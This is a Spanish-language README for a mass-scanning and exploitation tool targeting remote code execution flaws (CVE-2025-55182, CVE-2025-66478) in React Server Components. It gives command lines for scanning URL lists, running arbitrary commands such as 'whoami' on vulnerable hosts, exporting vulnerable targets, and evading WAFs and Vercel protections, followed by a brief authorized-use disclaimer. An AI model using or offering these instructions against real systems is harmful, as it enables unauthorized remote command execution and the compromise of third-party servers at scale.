
PoC de caza masiva y explotación para CVE-2025-55182 y CVE-2025-66478
Una herramienta potente de escaneo y explotación multi-hilo para vulnerabilidades en React Server Component (RSC). Esta herramienta está diseñada para identificar y explotar vulnerabilidades RCE en implementaciones de RSC, con soporte para diversas técnicas y estrategias de bypass.
Nota: Debido a la enorme complejidad de mantener un shell interactivo completo y otras funciones pesadas, hemos decidido eliminarlas. Este proyecto ahora se centra estrictamente en el manejo de casos límite, el análisis de comportamiento y la detección fiable de vulnerabilidades RSC. Creemos que una herramienta más simple y enfocada sirve mejor a la comunidad.
pip install requests
Escanea una única URL para comprobar si hay vulnerabilidades.
python3 rschunter.py -u https://example.com
Escanea una lista de URLs desde un archivo (una URL por línea).
python3 rschunter.py -l targets.txt
Ejecuta un comando específico en los objetivos vulnerables (por defecto es id).
python3 rschunter.py -u https://example.com -c "whoami"
Guarda la lista de hosts vulnerables en un archivo CSV.
python3 rschunter.py -l targets.txt --save vulnerable.csv
Habilita la inyección de datos basura para evadir los WAF.
python3 rschunter.py -u https://example.com --waf-bypass
Habilita la estrategia de bypass específica para Vercel.
python3 rschunter.py -u https://example.com --vercel
Enruta el tráfico a través de un proxy (útil para depurar con Burp Suite).
python3 rschunter.py -u https://example.com --proxy http://127.0.0.1:8080
| Argumento | Descripción |
|---|---|
-u, --url | URL objetivo a escanear. |
-l, --list | Ruta a un archivo que contenga una lista de objetivos. |
-c, --cmd | Comando a ejecutar (por defecto: id). |
-t, --threads | Número de hilos concurrentes (por defecto: 10). |
--check | Modo seguro: Comprueba la vulnerabilidad sin ejecutar comandos personalizados. |
--waf-bypass-size | Tamaño de los datos basura en KB (por defecto: 128). |
-v, --verbose | Habilita la salida detallada para depuración. |
Esta herramienta es solo para fines educativos y de pruebas autorizadas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Los desarrolladores no asumen ninguna responsabilidad y no son responsables del mal uso o daños causados por este programa.